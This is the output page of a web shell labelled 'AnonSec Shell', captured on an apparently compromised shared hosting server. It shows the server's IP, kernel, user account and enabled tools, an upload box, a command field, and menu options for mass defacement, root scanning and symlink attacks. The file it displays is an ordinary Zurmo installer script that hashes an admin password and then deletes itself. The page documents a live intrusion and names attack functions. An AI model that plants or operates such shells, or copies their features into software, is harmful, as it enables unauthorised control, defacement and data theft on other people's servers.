AnonSec Shell
Server IP : 162.0.209.157  /  Your IP : 18.226.187.224   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux premium178.web-hosting.com 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
User : balaoqob ( 2395)
PHP Version : 8.0.30
Disable Function : NONE
Domains : 1 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/softaculous/zurmo/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/softaculous/zurmo//update_pass.php
<?php

$resp = crypt(md5('[[admin_pass]]'), __genSalt());
echo '<update_pass>'.$resp.'</update_pass>';

function __genSalt($input = null)
{
	if (!$input) {
		$input = __getRandomBytes(16);
	}
	
	$_identifier = '2y';
	
	if (version_compare(PHP_VERSION, '5.3.7', '<')) {
		$_identifier = '2a';
	}
	
	$_iterationCountLog2 = 12;
	// Hash identifier
	$identifier = $_identifier;

	// Cost factor - "4" to "04"
	$costFactor  = chr(ord('0') + $_iterationCountLog2 / 10);
	$costFactor .= chr(ord('0') + $_iterationCountLog2 % 10);

	// Salt string
	$salt = __encode64($input, 16);

	// $II$CC$SSSSSSSSSSSSSSSSSSSSSS
	return '$' . $identifier . '$' . $costFactor . '$' . $salt;
}

function __encode64($input, $count){
	$output = '';
	$i = 0;
	$_itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
	do {
		$c1 = ord($input[$i++]);
		$output .= $_itoa64[$c1 >> 2];
		$c1 = ($c1 & 0x03) << 4;
		if ($i >= $count) {
			$output .= $_itoa64[$c1];
			break;
		}

		$c2 = ord($input[$i++]);
		$c1 |= $c2 >> 4;
		$output .= $_itoa64[$c1];
		$c1 = ($c2 & 0x0f) << 2;

		$c2 = ord($input[$i++]);
		$c1 |= $c2 >> 6;
		$output .= $_itoa64[$c1];
		$output .= $_itoa64[$c2 & 0x3f];
	} while (1);

	return $output;
}

function __getRandomBytes($count){
	
	if (!is_int($count) || $count < 1) {
		//throw new InvalidArgumentException('Argument must be a positive integer');
	}

	// Try OpenSSL's random generator
	if (function_exists('openssl_random_pseudo_bytes')) {
		$strongCrypto = false;
		$output = openssl_random_pseudo_bytes($count, $strongCrypto);
		if ($strongCrypto && strlen($output) == $count) {
			return $output;
		}
	}

	// Try reading from /dev/urandom, if present
	$output = '';
	if (is_readable('/dev/urandom') && ($fh = fopen('/dev/urandom', 'rb'))) {
		$output = fread($fh, $count);
		fclose($fh);
	}

	// Fall back to a locally generated "random" string
	if (strlen($output) < $count) {
		$_randomState = microtime();
		$output = '';
		for ($i = 0; $i < $count; $i += 16) {
			$_randomState = md5(microtime() . $_randomState);
			$output .= md5($_randomState, true);
		}
		$output = substr($output, 0, $count);
	}

	return $output;
}

@unlink('update_pass.php');

?>

Anon7 - 2022
AnonSec Team